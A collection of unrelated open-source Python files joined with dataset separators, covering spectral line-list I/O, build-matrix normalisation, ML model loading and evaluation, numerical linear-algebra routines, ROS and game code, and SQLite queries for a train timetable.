def verify(self):
"""Verify Authentication"""
pass
| StarcoderdataPython |
1914981 | """ Module for I/O in arclines
"""
from __future__ import (print_function, absolute_import, division, unicode_literals)
import numpy as np
import os
import datetime
import pdb
from astropy.table import Table, Column, vstack
from astropy.io import fits
from linetools import utils as ltu
import arclines # For path
from arclines import defs
line_path = arclines.__path__[0]+'/data/lists/'
nist_path = arclines.__path__[0]+'/data/NIST/'
def load_by_hand():
""" By-hand line list
Parameters
----------
line_file
add_path
Returns
-------
byhand : Table
"""
str_len_dict = defs.str_len()
src_file = arclines.__path__[0]+'/data/sources/by_hand_list.ascii'
# Read
line_list = Table.read(src_file, format='ascii.fixed_width', comment='#')
# Add
line_list['NIST'] = 1
# Deal with Instr and Source
ilist, slist = [], []
for row in line_list:
ilist.append(defs.instruments()[row['sInstr']]) # May need to split
slist.append(row['sSource'])
line_list['Instr'] = ilist
line_list['Source'] = np.array(slist, dtype='S{:d}'.format(str_len_dict['Source']))
# Trim
return line_list[['ion', 'wave', 'NIST', 'Instr', 'amplitude', 'Source']]
def load_line_list(line_file, add_path=False, use_ion=False, NIST=False):
"""
Parameters
----------
line_file : str
Full path to line_list or name of ion
add_path : bool, optional
Not yet implemented
NIST : bool, optional
NIST formatted table?
Returns
-------
line_list : Table
"""
if use_ion:
line_file = line_path+'{:s}_lines.dat'.format(line_file)
line_list = Table.read(line_file, format='ascii.fixed_width', comment='#')
# NIST?
if NIST:
# Remove unwanted columns
tkeys = line_list.keys()
for badkey in ['Ritz','Acc.','Type','Ei','Lower','Upper','TP','Line']:
for tkey in tkeys:
if badkey in tkey:
line_list.remove_column(tkey)
# Relative intensity -- Strip junk off the end
reli = []
for imsk, idat in zip(line_list['Rel.'].mask, line_list['Rel.'].data):
if imsk:
reli.append(0.)
else:
try:
reli.append(float(idat))
except ValueError:
try:
reli.append(float(idat[:-1]))
except ValueError:
reli.append(0.)
line_list.remove_column('Rel.')
line_list['RelInt'] = reli
#
gdrows = line_list['Observed'] > 0. # Eliminate dummy lines
line_list = line_list[gdrows]
line_list.rename_column('Observed','wave')
# Others
# Grab ion name
i0 = line_file.rfind('/')
i1 = line_file.rfind('_')
ion = line_file[i0+1:i1]
line_list.add_column(Column([ion]*len(line_list), name='Ion', dtype='U5'))
line_list.add_column(Column([1]*len(line_list), name='NIST'))
# Return
return line_list
def load_line_lists(lines, unknown=False, skip=False, all=False, NIST=False):
""" Loads a series of line list files
Parameters
----------
lamps : list
unknown : bool, optional
skip : bool, optional
Skip missing line lists (mainly for building)
NIST : bool, optional
Load the full NIST linelists
Returns
-------
line_list : Table
"""
import glob
# All?
if all:
line_files = glob.glob(line_path+'*_lines.dat')
lines = []
for line_file in line_files:
i0 = line_file.rfind('/')
i1 = line_file.rfind('_')
lines.append(line_file[i0+1:i1])
# Read standard files
lists = []
for line in lines:
if NIST:
line_file = nist_path+'{:s}_vacuum.ascii'.format(line)
else:
line_file = line_path+'{:s}_lines.dat'.format(line)
if not os.path.isfile(line_file):
if not skip:
import pdb; pdb.set_trace()
raise IOError("Input line {:s} is not included in arclines".format(line))
else:
lists.append(load_line_list(line_file, NIST=NIST))
# Stack
if len(lists) == 0:
return None
line_lists = vstack(lists, join_type='exact')
# Unknown
if unknown:
unkn_lines = load_unknown_list(lines)
unkn_lines.remove_column('line_flag') # may wish to have this info
# Stack
line_lists = vstack([line_lists, unkn_lines])
# Return
return line_lists
def load_source_table():
""" Load table of arcline sources
Returns
-------
sources : Table
"""
src_file = arclines.__path__[0]+'/data/sources/arcline_sources.ascii'
# Load
sources = Table.read(src_file, format='ascii.fixed_width', comment='#')
# Return
return sources
def load_nist(ion):
"""Parse a NIST ASCII table. Note that the long ---- should have
been commented out and also the few lines at the start.
Parameters
----------
ion : str
Name of ion
Returns
-------
tbl : Table
Table of lines
"""
import glob
# Root (for development only)
root = arclines.__path__[0]
# Find file
srch_file = root + '/data/NIST/'+ion+'_vacuum.ascii'
nist_file = glob.glob(srch_file)
if len(nist_file) == 0:
raise IOError("Cannot find NIST file {:s}".format(srch_file))
# Read
nist_tbl = Table.read(nist_file[0], format='ascii.fixed_width')
gdrow = nist_tbl['Observed'] > 0. # Eliminate dummy lines
nist_tbl = nist_tbl[gdrow]
# Now unique values only (no duplicates)
uniq, indices = np.unique(nist_tbl['Observed'],return_index=True)
nist_tbl = nist_tbl[indices]
# Deal with Rel
agdrel = []
for row in nist_tbl:
try:
gdrel = int(row['Rel.'])
except:
try:
gdrel = int(row['Rel.'][:-1])
except:
gdrel = 0
agdrel.append(gdrel)
agdrel = np.array(agdrel)
# Remove and add
nist_tbl.remove_column('Rel.')
nist_tbl.remove_column('Ritz')
nist_tbl['RelInt'] = agdrel
#nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='S5'))
nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='U5'))
nist_tbl.rename_column('Observed','wave')
# Return
return nist_tbl
def load_unknown_list(lines, unknwn_file=None, all=False):
"""
Parameters
----------
lines : list
Restricted lines; use all=True for all
unknwn_file : str, optional
all : bool, optional
Returns
-------
unknwn_lines : Table
"""
line_dict = defs.lines()
# Load
line_path = arclines.__path__[0]+'/data/lists/'
if unknwn_file is None:
unknwn_file = line_path+'UNKNWNs.dat'
line_list = load_line_list(unknwn_file)
# Cut on input lamps?
if all:
return line_list
else:
msk = np.array([False]*len(line_list))
for line in lines:
line_flag = line_dict[line]
match = line_list['line_flag'] % (2*line_flag) >= line_flag
msk[match] = True
# Finish
return line_list[msk]
def load_spectrum(spec_file, index=0):
""" Load a simple spectrum from input file
Parameters
----------
spec_file : str
.fits -- Assumes simple ndarray in 0 extension
.ascii -- Assumes Table.read(format='ascii') will work with single column
Returns
-------
"""
import h5py
iext = spec_file.rfind('.')
if 'ascii' in spec_file[iext:]:
tbl = Table.read(spec_file, format='ascii')
key = tbl.keys()[0]
spec = tbl[key].data
elif 'fits' in spec_file[iext:]:
spec = fits.open(spec_file)[0].data
elif 'hdf5' in spec_file[iext:]:
hdf = h5py.File(spec_file, 'r')
if 'arcs' in hdf.keys():
print("Taking arc={:d} in this file".format(index))
spec = hdf['arcs/'+str(index)+'/spec'].value
else:
raise IOError("Not ready for this hdf5 file")
elif 'json' in spec_file[iext:]:
jdict = ltu.loadjson(spec_file)
try:
spec = np.array(jdict['spec'])
except KeyError:
raise IOError("spec not in your JSON dict")
# Return
return spec
def write_line_list(tbl, outfile):
"""
Parameters
----------
tbl
outfile
"""
# Format
tbl['wave'].format = '10.4f'
# Write
with open(outfile,'w') as f:
f.write('# Creation Date: {:s}\n'.format(str(datetime.date.today().strftime('%Y-%b-%d'))))
tbl.write(f, format='ascii.fixed_width')
| StarcoderdataPython |
97696 | #!/usr/bin/env python
import sys, json
from functools import reduce
inputFile = sys.argv[1]
outputFile = sys.argv[2]
with open(inputFile, 'r') as f:
data = f.read()
config = json.loads(data)
def copy_without(xs, key):
ys = xs.copy()
ys.pop(key)
return ys
def merge_filtered(result, xs, pred):
for key, val in xs.items():
if pred(key):
result[key] = val
return result
def make_pipeline(*functions):
return reduce(lambda f, g: lambda x: g(f(x)), functions)
def filter_step(f):
return lambda xs: filter(f, xs)
def map_step(f):
return lambda xs: map(f, xs)
def reduce_step(f):
return lambda xs: reduce(f, xs)
def lift_builds(os, settings):
res = map(lambda build: [os, build, copy_without(settings, 'builds')],
settings['builds'])
return list(res)
def normalize(what, settings, buildType, defaults):
key1 = 'extraBuild{}'.format(what.capitalize())
key2 = 'extra{}Build{}'.format(buildType.capitalize(), what.capitalize())
res1 = settings[key1] if key1 in settings else []
res2 = settings[key2] if key2 in settings else []
return merge_filtered({ what: defaults + res1 + res2 },
settings,
lambda key: not key.endswith(what.capitalize()))
def normalize_entry(os, build_type, settings, what):
key = 'build{}'.format(what.capitalize())
defaults = config[key] if key in config else []
return [os, build_type, normalize(what, settings, build_type, defaults)]
def add_tags_if_missing(os, build_type, settings):
res = settings
if not 'tags' in res:
res['tags'] = []
return [os, build_type, res]
def call(f, args):
return f(*args)
buildMatrix = config['buildMatrix']
pipeline = make_pipeline( \
map_step(lambda entry: lift_builds(*entry)),
reduce_step(lambda x, y: x + y),
map_step(lambda entry: call(normalize_entry, entry + ['flags'])),
map_step(lambda entry: call(normalize_entry, entry + ['env'])),
map_step(lambda entry: add_tags_if_missing(*entry)))
normalizedBuildMatrix = list(pipeline(buildMatrix))
with open(outputFile, 'w') as f:
json.dump(normalizedBuildMatrix, f, indent=2)
| StarcoderdataPython |
269214 | <filename>floodsystem/analysis.py<gh_stars>0
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
def polyfit(dates , levels, p):
time_shift=1
date_num=matplotlib.dates.date2num(dates)
y=levels
d0=2
shifted_dates = date_num-date_num[0]
p_coeff=np.polyfit(shifted_dates,y,p)
poly=np.poly1d(p_coeff)
return(poly, time_shift)
| StarcoderdataPython |
3369082 | <gh_stars>1-10
from rasa_sdk.events import ConversationPaused
from covidflow.actions.action_goodbye import ActionGoodbye
from .action_test_helper import ActionTestCase
class ActionGoodbyeTest(ActionTestCase):
def setUp(self):
super().setUp()
self.action = ActionGoodbye()
def test_goodbye(self):
tracker = self.create_tracker()
self.run_action(tracker)
self.assert_events([ConversationPaused()])
self.assert_templates(["utter_goodbye"])
| StarcoderdataPython |
3395072 | <reponame>robinandeer/puzzle
# -*- coding: utf-8 -*-
from sqlalchemy import (Column, ForeignKey, Integer, String, UniqueConstraint,
Text)
from sqlalchemy.orm import relationship
from .models import BASE
class Suspect(BASE):
"""Represent a list of suspect variants."""
__tablename__ = "suspect"
__table_args__ = (UniqueConstraint('case_id', 'variant_id',
name='_case_variant_uc'),)
id = Column(Integer, primary_key=True)
variant_id = Column(Text, nullable=False)
name = Column(String(128))
case_id = Column(Integer, ForeignKey('case.id'), nullable=False)
case = relationship('Case', backref=('suspects'))
def __repr__(self):
return ("Suspect(case_id={this.case_id} variant_id={this.variant_id})"
.format(this=self))
| StarcoderdataPython |
3261613 | <reponame>MatthewRobertDunn/PyVaders
from entities.entity import Entity
import pymunk
from entities.physics_trait import PhysicsTrait
from entities.takesdamage_trait import TakesDamageTrait
class DestructibleTerrain(PhysicsTrait, TakesDamageTrait):
def create_physics_body(self, position):
self.physics_body = pymunk.Body(body_type=pymunk.Body.STATIC) # Create a Body
self.physics_body.position = position # Set the position of the body
BODY_WIDTH = 8.0
BODY_HEIGHT = 12.0
def create_graphics_model(self):
self.draw.create_card(self.BODY_WIDTH,self.BODY_HEIGHT)
#self.draw.set_texture_from_file("gfx/asteroid.png")
self.draw.set_texture_from_file_no_cache("gfx/asteroid.png")
self.hole_image = self.draw.load_image("gfx/hole_small.png")
self.physics_components = self.get_segments()
self.update_graphics_model()
def take_damage(self, source, amount, self_contact):
self_contact = self.physics_body.world_to_local(self_contact)
text_coord = self.draw.model_coord_to_texture_coord(self_contact,self.BODY_WIDTH,self.BODY_HEIGHT)
self.draw.mult_image(self.hole_image, text_coord)
#Get new physics segments
new_segments = self.get_segments()
if len(new_segments) == 0:
self.context.despawn_entity(self) #no physics segments, kill me.
else:
self.context.replace_physics_components(self,new_segments)
def get_segments(self):
segments = []
lines = self.draw.texture_to_geometry(self.BODY_WIDTH,self.BODY_HEIGHT,self.draw.texture)
for line in lines:
segment = pymunk.Segment(self.physics_body, line[0], line[1], 0.01)
segment.collision_type = 1
segment.entity = self
segments.append(segment)
return segments
| StarcoderdataPython |
11280215 | try:
# Django 1.6
from django.conf.urls import patterns, url
except:
from django.conf.urls.defaults import patterns, url
from semanticeditor.views import *
urlpatterns = patterns('',
url(r'retrieve_styles/', retrieve_styles, name="semantic.retrieve_styles"),
url(r'retrieve_commands/', retrieve_commands, name="semantic.retrieve_commands"),
url(r'separate_presentation/', separate_presentation, name="semantic.separate_presentation"),
url(r'combine_presentation/', combine_presentation, name="semantic.combine_presentation"),
url(r'clean_html/', clean_html_view, name="semantic.clean_html"),
url(r'preview/', preview, name="semantic.preview"),
)
| StarcoderdataPython |
66781 | from datetime import date
from typing import Dict
from pyspark.sql import SparkSession, Column, DataFrame
# noinspection PyUnresolvedReferences
from pyspark.sql.functions import lit
from pyspark.sql.functions import coalesce, to_date
from spark_auto_mapper.automappers.automapper import AutoMapper
from spark_auto_mapper.helpers.automapper_helpers import AutoMapperHelpers as A
def test_auto_mapper_date_literal(spark_session: SparkSession) -> None:
# Arrange
spark_session.createDataFrame(
[
(1, 'Qureshi', 'Imran'),
(2, 'Vidal', 'Michael'),
], ['member_id', 'last_name', 'first_name']
).createOrReplaceTempView("patients")
source_df: DataFrame = spark_session.table("patients")
df = source_df.select("member_id")
df.createOrReplaceTempView("members")
# Act
mapper = AutoMapper(
view="members",
source_view="patients",
keys=["member_id"],
drop_key_columns=False
).columns(birthDate=A.date("1970-01-01"))
assert isinstance(mapper, AutoMapper)
sql_expressions: Dict[str, Column] = mapper.get_column_specs(
source_df=source_df
)
for column_name, sql_expression in sql_expressions.items():
print(f"{column_name}: {sql_expression}")
assert str(sql_expressions["birthDate"]) == str(
coalesce(
to_date(lit("1970-01-01"), format='y-M-d'),
to_date(lit("1970-01-01"), format='yyyyMMdd'),
to_date(lit("1970-01-01"), format='M/d/y')
).alias("birthDate")
)
result_df: DataFrame = mapper.transform(df=df)
# Assert
result_df.printSchema()
result_df.show()
assert result_df.where("member_id == 1").select("birthDate").collect(
)[0][0] == date(1970, 1, 1)
assert result_df.where("member_id == 2").select("birthDate").collect(
)[0][0] == date(1970, 1, 1)
| StarcoderdataPython |
3219517 | <gh_stars>1-10
#!/usr/bin/python
# based on joint_state_publisher by <NAME>!!
import roslib; # roslib.load_manifest('tf_camera_gui')
import rospy
import wx
import tf
from math import pi
from threading import Thread
RANGE = 10000
class TfPublisher():
def __init__(self):
self.parent_frame = rospy.get_param('~parent_frame')
self.child_frame = rospy.get_param('~child_frame')
self.elements = {}
self.element_list = [] # for maintaining the original order of the elements
for name in ['x', 'y', 'z']:
value = rospy.get_param('~'+name, default=0.0)
element = {'min':-2.0, 'max':2.0, 'zero':value, 'value':value}
self.elements[name] = element
self.element_list.append(name)
for name in ['roll', 'pitch', 'yaw']:
value = rospy.get_param('~'+name, default=0.0)
element = {'min':-pi, 'max':pi, 'zero':value, 'value':value}
self.elements[name] = element
self.element_list.append(name)
def loop(self):
hz = rospy.get_param("~rate", 10) # 10hz
r = rospy.Rate(hz)
# Publish TF messages
while not rospy.is_shutdown():
br = tf.TransformBroadcaster()
br.sendTransform((self.elements['x']['value'], self.elements['y']['value'], self.elements['z']['value']),
tf.transformations.quaternion_from_euler(
self.elements['roll']['value'],
self.elements['pitch']['value'],
self.elements['yaw']['value']),
rospy.Time.now(),
self.child_frame,
self.parent_frame)
r.sleep()
class TfPublisherGui(wx.Frame):
def __init__(self, title, tfp):
wx.Frame.__init__(self, None, -1, title, (-1, -1));
self.tfp = tfp
self.element_map = {}
panel = wx.Panel(self, wx.ID_ANY);
box = wx.BoxSizer(wx.VERTICAL)
font = wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD)
### Sliders ###
for name in self.tfp.element_list:
element = self.tfp.elements[name]
if element['min'] == element['max']:
continue
row = wx.GridSizer(1,2)
label = wx.StaticText(panel, -1, name)
label.SetFont(font)
row.Add(label, 1, wx.ALIGN_CENTER_VERTICAL)
display = wx.TextCtrl (panel, value=str(0),
style=wx.TE_READONLY | wx.ALIGN_RIGHT)
row.Add(display, flag= wx.ALIGN_RIGHT| wx.ALIGN_CENTER_VERTICAL)
box.Add(row, 1, wx.EXPAND)
slider = wx.Slider(panel, -1, RANGE/2, 0, RANGE,
style= wx.SL_AUTOTICKS | wx.SL_HORIZONTAL)
slider.SetFont(font)
box.Add(slider, 1, wx.EXPAND)
self.element_map[name] = {'slidervalue':0, 'display':display,
'slider':slider, 'element':element}
### Buttons ###
self.ctrbutton = wx.Button(panel, 1, 'Center')
self.Bind(wx.EVT_SLIDER, self.sliderUpdate)
wx.EVT_BUTTON(self, 1, self.center_event)
box.Add(self.ctrbutton, 0, wx.EXPAND)
panel.SetSizer(box)
self.center()
box.Fit(self)
self.update_values()
def update_values(self):
for (name,element_info) in self.element_map.items():
purevalue = element_info['slidervalue']
element = element_info['element']
value = self.sliderToValue(purevalue, element)
element['value'] = value
element_info['slider'].SetValue(purevalue)
element_info['display'].SetValue("%.2f"%value)
def center_event(self, event):
self.center()
def center(self):
rospy.loginfo("Centering")
for (name,element_info) in self.element_map.items():
element = element_info['element']
element_info['slidervalue'] = self.valueToSlider(element['zero'], element)
self.update_values()
def sliderUpdate(self, event):
for (name,element_info) in self.element_map.items():
element_info['slidervalue'] = element_info['slider'].GetValue()
self.update_values()
def valueToSlider(self, value, element):
return (value - element['min']) * float(RANGE) / (element['max'] - element['min'])
def sliderToValue(self, slider, element):
pctvalue = slider / float(RANGE)
return element['min'] + (element['max']-element['min']) * pctvalue
if __name__ == '__main__':
try:
rospy.init_node('tf_publisher_gui')
tfp = TfPublisher()
app = wx.App()
gui = TfPublisherGui("TF Publisher", tfp)
gui.Show()
Thread(target=app.MainLoop).start()
tfp.loop()
except rospy.ROSInterruptException: pass
| StarcoderdataPython |
9682633 | import os
import yaml
import tarfile
import urllib.request
from urllib.parse import urlparse
from pathlib import Path
from tqdm import tqdm
from transformers import Wav2Vec2ForCTC, Wav2Vec2Processor
from ctcdecode import CTCBeamDecoder
class DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def create(model_path, revision):
cache_dir=model_path
if Path(model_path).is_dir():
processor = Wav2Vec2Processor.from_pretrained(model_path)
model = Wav2Vec2ForCTC.from_pretrained(model_path)
else:
cache_dir = os.path.join('/', 'models', 'published', model_path)
processor = Wav2Vec2Processor.from_pretrained(model_path, cache_dir=cache_dir, revision=revision)
model = Wav2Vec2ForCTC.from_pretrained(model_path, cache_dir=cache_dir, revision=revision)
targz_file_path=os.path.join(cache_dir, "kenlm.tar.gz")
if not Path(targz_file_path).is_file():
print ("Downloading kenlm language model version {}".format(revision))
file_url = os.path.join("https://huggingface.co", model_path, "resolve", revision, 'kenlm.tar.gz')
download(file_url, os.path.join(cache_dir, targz_file_path))
if not Path(os.path.join(cache_dir, "config_ctc.yaml")).is_file():
extract(targz_file_path)
with open(os.path.join(cache_dir, "config_ctc.yaml"), 'r') as config_file:
ctc_lm_params=yaml.load(config_file, Loader=yaml.FullLoader)
vocab=processor.tokenizer.convert_ids_to_tokens(range(0, processor.tokenizer.vocab_size))
space_ix = vocab.index('|')
vocab[space_ix]=' '
ctcdecoder = CTCBeamDecoder(vocab,
model_path='',
alpha=0,
beta=0,
cutoff_top_n=40,
cutoff_prob=1.0,
beam_width=100,
num_processes=4,
blank_id=processor.tokenizer.pad_token_id,
log_probs_input=True
)
kenlm_ctcdecoder = CTCBeamDecoder(vocab,
model_path=os.path.join(cache_dir, "lm.binary"),
alpha=ctc_lm_params['alpha'],
beta=ctc_lm_params['beta'],
cutoff_top_n=40,
cutoff_prob=1.0,
beam_width=100,
num_processes=4,
blank_id=processor.tokenizer.pad_token_id,
log_probs_input=True
)
return processor, model, vocab, ctcdecoder, kenlm_ctcdecoder
def download(file_url, output_file_path):
with DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=file_url.split('/')[-1]) as t:
urllib.request.urlretrieve(file_url, filename=output_file_path, reporthook=t.update_to)
def extract(targz_file_path):
# extract.
if targz_file_path.endswith(".tar.gz"):
print ("Extracting...")
model_dir = Path(targz_file_path).parent.absolute()
tar = tarfile.open(targz_file_path, "r:gz")
tar.extractall(model_dir)
tar.close()
#Path(output_file_path).unlink()
| StarcoderdataPython |
8043381 | <filename>tests/extmath_test.py
# encoding: utf-8
from __future__ import division, print_function
import numpy as np
import pytest as pt
from mpnum import _testing as mptest
from mpnum import factory, utils
from mpnum.utils import extmath as em
from numpy.testing import (assert_allclose, assert_array_almost_equal,
assert_array_equal)
from scipy.linalg import block_diag
from six.moves import range
def test_block_diag_simple(rgen):
rows = (4, 7)
cols = (3, 6)
summands = [factory._zrandn((rows[i], cols[i]), randstate=rgen)
for i in range(len(rows))]
blockdiag_sum = utils.block_diag(summands)
blockdiag_sum_scipy = block_diag(*summands)
assert_array_almost_equal(blockdiag_sum, blockdiag_sum_scipy)
def test_block_diag(rgen):
leftmargin = 3
rightmargin = 5
rows = (4, 7)
cols = (3, 6)
nr_blocks = len(rows)
nr_summands = 3
leftvecs = factory._zrandn((nr_blocks, nr_summands, leftmargin),
randstate=rgen)
middlematrices = [factory._zrandn((nr_summands, rows[i], cols[i]),
randstate=rgen)
for i in range(nr_blocks)]
rightvecs = factory._zrandn((nr_blocks, nr_summands, rightmargin),
randstate=rgen)
blockdiag_summands = []
for i in range(nr_blocks):
summand = np.zeros(
(leftmargin, rows[i], cols[i], rightmargin), dtype=complex)
for j in range(nr_summands):
summand += np.outer(
np.outer(leftvecs[i, j, :], middlematrices[i][j, :, :]),
rightvecs[i, j, :]).reshape(summand.shape)
blockdiag_summands.append(summand)
blockdiag_sum = utils.block_diag(blockdiag_summands, axes=(1, 2))
blockdiag_sum_explicit = np.zeros(
(leftmargin, sum(rows), sum(cols), rightmargin), dtype=complex)
for i in range(nr_blocks):
for j in range(nr_summands):
summands = [middlematrices[i2][j]
if i2 == i else np.zeros_like(middlematrices[i2][j])
for i2 in range(nr_blocks)]
middle = block_diag(*summands)
blockdiag_sum_explicit += \
np.outer(np.outer(leftvecs[i][j], middle), rightvecs[i][j]) \
.reshape(blockdiag_sum_explicit.shape)
assert_array_almost_equal(blockdiag_sum, blockdiag_sum_explicit)
TESTARGS_MATRIXDIMS = [(50, 50), (100, 50), (50, 75)]
TESTARGS_RANKS = [1, 10, 'fullrank']
@pt.mark.parametrize('rows, cols', TESTARGS_MATRIXDIMS)
@pt.mark.parametrize('rank', TESTARGS_RANKS)
@pt.mark.parametrize('dtype', pt.MP_TEST_DTYPES)
@pt.mark.parametrize('piter_normalizer', [None, 'qr', 'lu', 'auto'])
def test_approximate_range_finder(rows, cols, rank, dtype, piter_normalizer, rgen):
# only guaranteed to work for low-rank matrices
if rank is 'fullrank':
return
rf_size = rank + 10
assert min(rows, cols) > rf_size
A = mptest.random_lowrank(rows, cols, rank, randstate=rgen, dtype=dtype)
A /= np.linalg.norm(A, ord='fro')
Q = em.approx_range_finder(A, rf_size, 7, randstate=rgen,
piter_normalizer=piter_normalizer)
Q = np.asmatrix(Q)
assert Q.shape == (rows, rf_size)
normdist = np.linalg.norm(A - Q * (Q.H * A), ord='fro')
assert normdist < 1e-7
@pt.mark.parametrize('rows, cols', TESTARGS_MATRIXDIMS)
@pt.mark.parametrize('rank', TESTARGS_RANKS)
@pt.mark.parametrize('dtype', pt.MP_TEST_DTYPES)
@pt.mark.parametrize('transpose', [False, True, 'auto'])
@pt.mark.parametrize('n_iter, target_gen', [(7, mptest.random_lowrank),
(20, mptest.random_fullrank)])
def test_randomized_svd(rows, cols, rank, dtype, transpose, n_iter, target_gen,
rgen):
rank = min(rows, cols) - 2 if rank is 'fullrank' else rank
A = target_gen(rows, cols, rank=rank, randstate=rgen, dtype=dtype)
U_ref, s_ref, V_ref = utils.truncated_svd(A, k=rank)
U, s, V = em.randomized_svd(A, rank, transpose=transpose, randstate=rgen,
n_iter=n_iter)
error_U = np.abs(U.conj().T.dot(U_ref)) - np.eye(rank)
assert_allclose(np.linalg.norm(error_U), 0, atol=1e-3)
error_V = np.abs(V.dot(V_ref.conj().T)) - np.eye(rank)
assert_allclose(np.linalg.norm(error_V), 0, atol=1e-3)
assert_allclose(s.ravel() - s_ref, 0, atol=1e-3)
# Check that singular values are returned in descending order
assert_array_equal(s, np.sort(s)[::-1])
| StarcoderdataPython |
3312353 | import tensorflow as tf
import configuration
import numpy as np
from LSTM_model import LSTM_model
def main():
config = configuration.ModelConfig(data_filename="input_seqs_eval")
train(config)
def train(config):
with tf.Graph().as_default():
model = LSTM_model(config)
inputs_seqs_batch, outputs_batch = model.reader.read(shuffle=False, num_epochs=1)
init_op = tf.group(tf.initialize_all_variables(),
tf.initialize_local_variables())
sess = tf.Session()
sess.run(init_op)
saver = tf.train.Saver(tf.all_variables())
global_steps = 0
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
saver.restore(sess, "./save/LSTM/save-60000")
correct_count = 0
evaled_count = 0
try:
while not coord.should_stop():
input_data, targets = sess.run([inputs_seqs_batch, outputs_batch])
probs = sess.run([model.probs], {model.input_data: input_data,
model.targets: targets})
probs = np.array(probs).reshape([-1, config.vocab_size])
targets = np.array([t[0] for t in targets])
output = np.argmax(probs, axis=1)
correct_count += np.sum(output == targets)
evaled_count += len(output)
except tf.errors.OutOfRangeError:
pass
finally:
# When done, ask the threads to stop.
coord.request_stop()
print("Accuracy: %f" % (float(correct_count) / evaled_count))
coord.join(threads)
sess.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
6463840 | # 2.
# Используя расщепление матрицы Стилтьеса, отвечающее её неполной факторизации по методу ILU(k),
# реализовать стационарный итерационный процесс и исследовать скорость его сходимости
#
# стр. 65 - Основные стационарные итерационные процессы
# стр. 75 - ускорение сходимости стационарных итерационных процессов
#
# http://mathworld.wolfram.com/StationaryIterativeMethod.html
# Stationary iterative methods are methods for solving a linear system of equations Ax=b
#
import numpy as np
ITERATION_LIMIT = 1000
# initialize the matrix
A = np.array([[10., -1., 2., 0.],
[-1., 11., -1., 3.],
[2., -1., 10., -1.],
[0., 3., -1., 8.]])
# initialize the RHS vector
b = np.array([6., 25., -11., 15.])
def jacobi_method(A: np.ndarray, b: np.ndarray):
x = np.zeros_like(b)
for it_count in range(ITERATION_LIMIT):
# print("Current solution:", x)
x_new = np.zeros_like(x)
for i in range(A.shape[0]):
s1 = np.dot(A[i, :i], x[:i])
s2 = np.dot(A[i, i + 1:], x[i + 1:])
x_new[i] = (b[i] - s1 - s2) / A[i, i]
if np.allclose(x, x_new, atol=1e-8):
break
x = x_new
return x
def gauss_seidel(A: np.ndarray, b: np.ndarray):
x = np.zeros_like(b)
for it_count in range(ITERATION_LIMIT):
# print("Current solution:", x)
x_new = np.zeros_like(x)
for i in range(A.shape[0]):
s1 = np.dot(A[i, :i], x_new[:i])
s2 = np.dot(A[i, i + 1:], x[i + 1:])
x_new[i] = (b[i] - s1 - s2) / A[i, i]
if np.allclose(x, x_new, rtol=1e-8):
break
x = x_new
return x
def sor_method(A: np.ndarray, b: np.ndarray, w=1.0):
x = np.zeros_like(b)
for it_count in range(ITERATION_LIMIT):
# print("Current solution:", x)
x_new = np.zeros_like(x)
for i in range(A.shape[0]):
s1 = np.dot(A[i, :i], x_new[:i])
s2 = np.dot(A[i, i + 1:], x[i + 1:])
x_new[i] = (1.0 - w)*x[i] + w * (b[i] - s1 - s2) / A[i, i]
if np.allclose(x, x_new, rtol=1e-8):
break
x = x_new
return x
def ssor_method(A: np.ndarray, b: np.ndarray, w=1.0):
x = np.zeros_like(b)
xk = np.zeros(shape=(ITERATION_LIMIT, x.shape[0]), dtype=np.float)
for it_count in range(ITERATION_LIMIT):
# print("Current solution:", x)
k = it_count
xk[k] = np.zeros_like(x)
# вычисляем вектор x^{k/2} на основе вектора x^{k-1} по методу SOR в прямом порядке
# вычисляем вектор x^{k} на основе вектора x^{k/2} по методу SOR в обратном порядке
for i in range(A.shape[0]):
s1 = np.dot(A[i, :i], xk[k-1][:i])
s2 = np.dot(A[i, i + 1:], x[i + 1:])
xk[k/2][i] = (1.0 - w)*x[i] + w * (b[i] - s1 - s2) / A[i, i]
#
for i in reversed(range(A.shape[0])):
s1 = np.dot(A[i, :i], xk[k/2][:i])
s2 = np.dot(A[i, i + 1:], x[i + 1:])
xk[k][i] = (1.0 - w)*x[i] + w * (b[i] - s1 - s2) / A[i, i]
if np.allclose(x, xk[k], rtol=1e-8):
break
x = xk[k]
return x
x = sor_method(A, b)
print("Final solution:")
print(x)
error = np.dot(A, x) - b
print("Error:")
print(error) | StarcoderdataPython |
3453135 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sqlite3
import json
def connect(db = "tr5nr.sqlite"):
""" connects to SQLite database
:param db: database file
:return: connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db)
except sqlite3.Error as e:
print(e)
return conn
def query(conn, sql = ""):
""" makes a SQL Query to the connection
:param conn: sqlite connection object
:param sql: sql query
:return: cursor rows object
"""
cursor = conn.cursor()
cursor.execute(sql)
rows = cursor.fetchall()
return rows
def get_stations(conn):
sql = """
SELECT codigo, nombre, tramo, tiempo, tipo from estacion ORDER BY codigo ASC
"""
rows = query(conn, sql)
data = []
for row in rows:
data.append({
"code": row[0],
"name": row[1],
"section": row[2],
"time": row[3],
"type": row[4]
})
return data
def get_users(conn):
sql = """
SELECT codigo, tipo FROM usuario ORDER BY codigo ASC
"""
rows = query(conn, sql)
data = []
for row in rows:
category = "general"
if row[0] == 1:
category = "student"
elif row[0] == 2:
category = "senior"
elif row[0] == 3:
category = "handicapped"
elif row[0] == 4:
category = "special"
data.append({
"code": row[0],
"name": row[1],
"category": category
})
return data
def get_schedules(conn):
sql = """
SELECT origen, direccion, dia, hora FROM horario ORDER BY origen ASC
"""
rows = query(conn, sql)
data = []
for row in rows:
data.append({
"origin": row[0],
"destination": row[1],
"day": row[2],
"time": row[3]
})
return data
def get_ranges(conn):
sql = """
SELECT codigo, tipo, desde, hasta FROM rango ORDER BY codigo ASC
"""
rows = query(conn, sql)
data = []
for row in rows:
category = "low"
if row[0] == 1:
category = "mid"
elif row[0] == 2:
category = "high"
data.append({
"code": row[0],
"name": row[1],
"start": row[2],
"end": row[3],
"category": category
})
return data
def get_fares(conn):
sql = """
